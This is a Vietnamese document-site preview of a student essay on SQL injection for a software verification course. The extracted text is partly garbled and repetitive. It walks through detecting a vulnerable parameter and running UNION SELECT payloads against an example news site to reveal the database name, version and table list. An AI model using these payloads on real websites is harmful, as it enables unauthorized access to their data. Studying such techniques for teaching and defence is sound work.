1. Trang chủ
  2. » Luận Văn - Báo Cáo

Tiểu luận môn kiểm chứng phần mềm LỖI BẢO MẬT WEBSITE SQL INJECTION

14 467 0

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang 14
Dung lượng 535,5 KB

Nội dung

 GI I THI UỚ Ệ LỖI BẢO MẬT WEBSITE SQL INJECTION NHỮNG BƯỚC CẦN LÀM ĐỂ KHAI THÁC SQL INJECTION  XÁC ĐỊNH XEM WEB ĐÓ CÓ BỊ DÍNH LỖI SQL INJECTION HAY KHÔNG  NẾU KHÔNG DÍNH THÌ NGHỈ CHƠI  NẾU DÍNH THÌ TIẾP TỤC CHƠI TIẾP CÁC B C TH C HI N KHI WEBSITE B L IƯỚ Ự Ệ Ị Ỗ  L Y TÊN DATABASEẤ  XÁC ĐỊNH VERSION CỦA DATABASE  XÁC ĐỊNH CÁC TABLES CỦA DATABASE  XÁC ĐỊNH CÁC COLUMN CỦA TỪNG TABLE  LẤY THÔNG TIN CÁC B C TH C HI N KHI WEBSITE B L IƯỚ Ự Ệ Ị Ỗ  L Y TÊN DATABASEẤ  XÁC ĐỊNH VERSION CỦA DATABASE  XÁC ĐỊNH CÁC TABLES CỦA DATABASE  XÁC ĐỊNH CÁC COLUMN CỦA TỪNG TABLE  LẤY THÔNG TIN CÁCH NH N BI T WEBSITE B L I SQL Ậ Ế Ị Ỗ INJECTION  THÊM DẤU NHÁY ĐƠN VÀO SAU ID http://webcuateo.com/tintuc.php?id=12’  THÔNG BÁO LỖI Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /data/home/dbteo/htdocs/tintuc.php on line 25  DEMO XÁC ĐỊNH CÁC CỘT GÂY RA LỖI SQL INJECTION  CÚ PHÁP: Thêm dấu trừ trước id và câu lệnh sql phía sau id  VÍ DỤ: http://webcuateo.com/tintuc.php?id=-12 union select all 1,2,3,4  DEMO TH CHO Đ N KHI CÓ K T QU TR V LÀ CÁC Ử Ế Ế Ả Ả Ề C T GÂY NÊN L I SQLỘ Ỗ  KẾT QUẢ NHƯ SAU: XÁC ĐỊNH TÊN DATABASE  CÚ PHÁP: Tên web site/loại tin?id=-x union select all 1,2,3,4,database(),6,7,8,…y from information_schema.tables where table_schema = database()  VÍ DỤ: webcuateo.com/tintuc.php?id=-12 union select all 1,2,3,4,database(),6,7,8,9,10,11 from information_schema.tables where table_schema = database()  DEMO XÁC ĐỊNH VERSION CỦA DATABASE  CÚ PHÁP: Tên web site/loại tin?id=-x union select all 1,2,3,4,version(),6,7,8,…y from information_schema.tables where table_schema = database()  VÍ DỤ: webcuateo.com/tintuc.php?id=-12 union select all 1,2,3,4,version(),6,7,8,9,10,11 from information_schema.tables where table_schema = database()  DEMO XÁC ĐỊNH CÁC B NG C A Ả Ủ DATABSE  CÚ PHÁP: Tên web site/loại tin?id=-x union select all 1,2,3,4,group_concat(table_name),6,7,8,…y from information_schema.tables where table_schema = database()  VÍ DỤ: webcuateo.com/tintuc.php?id=-12 union select all 1,2,3,4,group_concat(table_name),6,7,8,9,10,11 from information_schema.tables where table_schema = database()  DEMO .  GI I THI UỚ Ệ LỖI BẢO MẬT WEBSITE SQL INJECTION NHỮNG BƯỚC CẦN LÀM ĐỂ KHAI THÁC SQL INJECTION  XÁC ĐỊNH XEM WEB ĐÓ CÓ BỊ DÍNH LỖI SQL INJECTION HAY KHÔNG  NẾU KHÔNG DÍNH. T WEBSITE B L I SQL Ậ Ế Ị Ỗ INJECTION  THÊM DẤU NHÁY ĐƠN VÀO SAU ID http://webcuateo.com/tintuc.php?id=12’  THÔNG BÁO LỖI Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL. /data/home/dbteo/htdocs/tintuc.php on line 25  DEMO XÁC ĐỊNH CÁC CỘT GÂY RA LỖI SQL INJECTION  CÚ PHÁP: Thêm dấu trừ trước id và câu lệnh sql phía sau id  VÍ DỤ: http://webcuateo.com/tintuc.php?id=-12

Ngày đăng: 08/04/2015, 20:35

TỪ KHÓA LIÊN QUAN